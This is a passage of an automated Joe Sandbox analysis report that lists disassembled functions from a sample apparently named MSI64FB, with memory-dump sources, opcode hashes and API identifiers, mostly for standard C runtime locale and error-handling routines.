                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo_noreturn$_invalid_parameter_noinfo
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1283921372-0
                                                                                                                                                                                                                                                    • Opcode ID: 8683fda1d7f2cf2fe16f18fd1a6c84b59257381d174357920ff1f712dcc13dc6
                                                                                                                                                                                                                                                    • Instruction ID: a96c7403251c1fa2006aa8edc16eae921e57b0bef0d5608b8ac7c164ff34f792
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8683fda1d7f2cf2fe16f18fd1a6c84b59257381d174357920ff1f712dcc13dc6
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2B021062F18A84CAFB10AF65D8507FDA371AB547E8F844731EE5C67ADADE2CD2418310
                                                                                                                                                                                                                                                    Function 00007FF749F6F5C0 Relevance: 3.5, APIs: 2, Instructions: 456COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo_noreturn$_invalid_parameter_noinfo
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1283921372-0
                                                                                                                                                                                                                                                    • Opcode ID: 97489fdd0152be2848b87501ab8184f999298cc24e0216d922afc6907825dde9
                                                                                                                                                                                                                                                    • Instruction ID: 338c1e6bc19a7db6e258b41e8d3577a72d5a30e003b2feb87dcd6736929165f2
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 97489fdd0152be2848b87501ab8184f999298cc24e0216d922afc6907825dde9
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C2020162F18A848AFB10AF65D8507FDA3B1AB557D8F804331EE5C27BD9EE2CD5418310
                                                                                                                                                                                                                                                    Function 00007FF749F88AA8 Relevance: 2.8, Strings: 2, Instructions: 347COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: a/p$am/pm
                                                                                                                                                                                                                                                    • API String ID: 0-3206640213
                                                                                                                                                                                                                                                    • Opcode ID: 438b8e3391503fb9951029006b54b7e8068a38d419b57045a4fe6ea7fcdb07ce
                                                                                                                                                                                                                                                    • Instruction ID: 1731201c66de36ecde5dc4b609aebcd4d0e6c965f93353296794d3b2c7e05b83
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 438b8e3391503fb9951029006b54b7e8068a38d419b57045a4fe6ea7fcdb07ce
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4CE17E22A1C642C5E7A4FF1485581B9E2B2FF557C4FD48532EA2D26AD8DF3CE941C320
                                                                                                                                                                                                                                                    Function 00007FF749F8F2D0 Relevance: 2.6, Strings: 2, Instructions: 144COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: e+000$gfff
                                                                                                                                                                                                                                                    • API String ID: 0-3030954782
                                                                                                                                                                                                                                                    • Opcode ID: 011e795fb9bf1fe48c8b96f5bd64963dfe1e97779e8fd65820847a8dd4772f89
                                                                                                                                                                                                                                                    • Instruction ID: 8060b7c967357dc4bd889fd0e6352a08d8a68ad9a2fa41490371e9c1091cc920
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 011e795fb9bf1fe48c8b96f5bd64963dfe1e97779e8fd65820847a8dd4772f89
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 18518A62B1C2C5CAE765EE36D800769F7A1E744B94F988232CBAC4BAD1CF3DD4448710
                                                                                                                                                                                                                                                    Function 00007FF749F5EEDC Relevance: 2.1, Strings: 1, Instructions: 812COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                                                                                                                                                                                                    • String ID: 0123456789ABCDEFabcdef-+Xx
                                                                                                                                                                                                                                                    • API String ID: 593203224-2799312399
                                                                                                                                                                                                                                                    • Opcode ID: 9a49191a50288544803617f672c3eab9da9a77a755532826adaf78feedd35dca
                                                                                                                                                                                                                                                    • Instruction ID: d77912d0aa8b9e50462af37099e0f2039342c2599f3ff03d1ecdda8b86e1d97e
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9a49191a50288544803617f672c3eab9da9a77a755532826adaf78feedd35dca
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9C727E26A4CA82D9EB50BF25C05027CB7B1EB40F98BA59071DE4E1B7E6DE3DD941D320
                                                                                                                                                                                                                                                    Function 00007FF749F5E468 Relevance: 2.1, Strings: 1, Instructions: 806COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: LockitLockit::_std::_
                                                                                                                                                                                                                                                    • String ID: 0123456789ABCDEFabcdef-+Xx
                                                                                                                                                                                                                                                    • API String ID: 3382485803-2799312399
                                                                                                                                                                                                                                                    • Opcode ID: 75eec2c592aeb8d5a85c63aa0f3a653fdae2001c8bccde947de1640178a9a200
                                                                                                                                                                                                                                                    • Instruction ID: d5278c73a7d1ec8c8044fb7875be3a61b4580b438275c6a67a1882241466b871
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 75eec2c592aeb8d5a85c63aa0f3a653fdae2001c8bccde947de1640178a9a200
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 45727D26A0CA86E9EB50BF25D05417CB7B1EB40F98B969031DE4E1B7E6DE3DD941C320
                                                                                                                                                                                                                                                    Function 00007FF749F54DB4 Relevance: 2.0, Strings: 1, Instructions: 775COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                                                                                                                                                                                                    • String ID: 0123456789ABCDEFabcdef-+Xx
                                                                                                                                                                                                                                                    • API String ID: 593203224-2799312399
                                                                                                                                                                                                                                                    • Opcode ID: b37127e4aad4c4b3dc5ee089604c8ad0a44b676b1f83e5ae15dec5ce963cb7b9
                                                                                                                                                                                                                                                    • Instruction ID: 59174c8d511b76848c389d21a8a1ee305403ff94be8ba4873e54729618d73198
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b37127e4aad4c4b3dc5ee089604c8ad0a44b676b1f83e5ae15dec5ce963cb7b9
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 65728322A0CA81D9EB11BF69C45027CB7B1AB41FA8F964031CA4D4B7E6DF3DE945C360
                                                                                                                                                                                                                                                    Function 00007FF749F8AB40 Relevance: 1.9, APIs: 1, Instructions: 373COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Info
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1807457897-0
                                                                                                                                                                                                                                                    • Opcode ID: 189df7a0d5afd0ef7f6deeb390458cedfcb3438f37d4f19d6cfbd7c090e291c2
                                                                                                                                                                                                                                                    • Instruction ID: a6ebebb256035cc9690a2cb68b880aa5d8ed56e72602dea2c265c3e58744f220
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 189df7a0d5afd0ef7f6deeb390458cedfcb3438f37d4f19d6cfbd7c090e291c2
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8502BB22A1CBC1C6E751EF3894142F9B7A0FB59748F859235EB9C97692EF38E195C300
                                                                                                                                                                                                                                                    Function 00007FF749F960A0 Relevance: 1.8, APIs: 1, Instructions: 337COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 5102861b4e01de12da26c2ae3c3a4ce8dfeea83b3d3e6353534988ecc4bc1b17
                                                                                                                                                                                                                                                    • Instruction ID: 2293fbc548e5705df2c911a1d667a400fe9f1e80ac5b7e4d5ee5025d6f047292
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5102861b4e01de12da26c2ae3c3a4ce8dfeea83b3d3e6353534988ecc4bc1b17
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4AE16132A08B4186E720EF61E4502EEA7B4F795788F804631DF9D57B96EF78E245C350
                                                                                                                                                                                                                                                    Function 00007FF749F6A4E0 Relevance: 1.8, APIs: 1, Instructions: 330COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: LockitLockit::__invalid_parameter_noinfo_noreturnstd::_
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3145298356-0
                                                                                                                                                                                                                                                    • Opcode ID: 706e233060a5830de7f93fb97a70e7d9b0585a127fdda33efc4d4c10d0d599f6
                                                                                                                                                                                                                                                    • Instruction ID: e0d197600561f7db6fb37e9a894cab96a283d1b2e3c35e1c8996ba6b4b43b323
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 706e233060a5830de7f93fb97a70e7d9b0585a127fdda33efc4d4c10d0d599f6
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 15D19B22B08B46D9EB10EFA5D4402ADB7B1FB45B88F944132DE4D577A9EF38D856C310
                                                                                                                                                                                                                                                    Function 00007FF749F927C0 Relevance: 1.7, APIs: 1, Instructions: 222COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ExceptionRaise
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3997070919-0
                                                                                                                                                                                                                                                    • Opcode ID: 98d6bb8ec4d8016ca5be2b46351b761a86428196a239938b46cd90c15da02aa6
                                                                                                                                                                                                                                                    • Instruction ID: b38705e2c306758196b1d4ec1de7652e33d97d598da41cf194032dea9aad5d90
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 98d6bb8ec4d8016ca5be2b46351b761a86428196a239938b46cd90c15da02aa6
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B9B16C73A08B85CBE7199F69C4453A8B7B0F745B68F048A26DB6E477E8CB38D461C710
                                                                                                                                                                                                                                                    Function 00007FF749F813E8 Relevance: 1.6, Strings: 1, Instructions: 354COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: 0
                                                                                                                                                                                                                                                    • API String ID: 0-4108050209
                                                                                                                                                                                                                                                    • Opcode ID: 539f6e1b2e5c6e546089afd7eb16296cc36714faba7fe5d0cd695467402e10ed
                                                                                                                                                                                                                                                    • Instruction ID: c6e0d84acb256087d7c3fb8830a6a38961bae742f817b03fd5846dca8b1d3192
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 539f6e1b2e5c6e546089afd7eb16296cc36714faba7fe5d0cd695467402e10ed
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C4E1A072B0C646C5EBA5FE288444A7CE7B1AB46B58FA44335CA5D267D8CF29E841C360
                                                                                                                                                                                                                                                    Function 00007FF749F982D0 Relevance: 1.6, APIs: 1, Instructions: 70COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: InfoLocale
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2299586839-0
                                                                                                                                                                                                                                                    • Opcode ID: 6561236546b80c929474212d425a040ae5b7b2b765a597ade3fbb2eca490ffd7
                                                                                                                                                                                                                                                    • Instruction ID: 19fa6f94f66af509cd578c077de257b939395e1fdfa963b14fc805e306af9a61
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6561236546b80c929474212d425a040ae5b7b2b765a597ade3fbb2eca490ffd7
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4A314B32A0C682C6EB64BE25E4417BAB2A0BB85784FC08135DA5D93285DF2CE4008B10
                                                                                                                                                                                                                                                    Function 00007FF749F97F18 Relevance: 1.6, APIs: 1, Instructions: 61COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • EnumSystemLocalesW.KERNEL32(?,?,?,00007FF749F98725,00000000,00000092,?,?,00000000,?,?,00007FF749F8D493), ref: 00007FF749F97FB6
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: EnumLocalesSystem
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2099609381-0
                                                                                                                                                                                                                                                    • Opcode ID: 47b944eeafb250c54d068d10f20b40a869fc240e3044a791ad7e753f5ce3764d
                                                                                                                                                                                                                                                    • Instruction ID: 5fa75885eee5c4e20147324136198c3fba3d8746f3e7f3418c3acff6c476bf6f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 47b944eeafb250c54d068d10f20b40a869fc240e3044a791ad7e753f5ce3764d
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7011D263A2CA45CAEB14BF15D0406B8B7B1FB92BA4F848135D629533D0DA38D5D1C790
                                                                                                                                                                                                                                                    Function 00007FF749F984DC Relevance: 1.6, APIs: 1, Instructions: 56COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
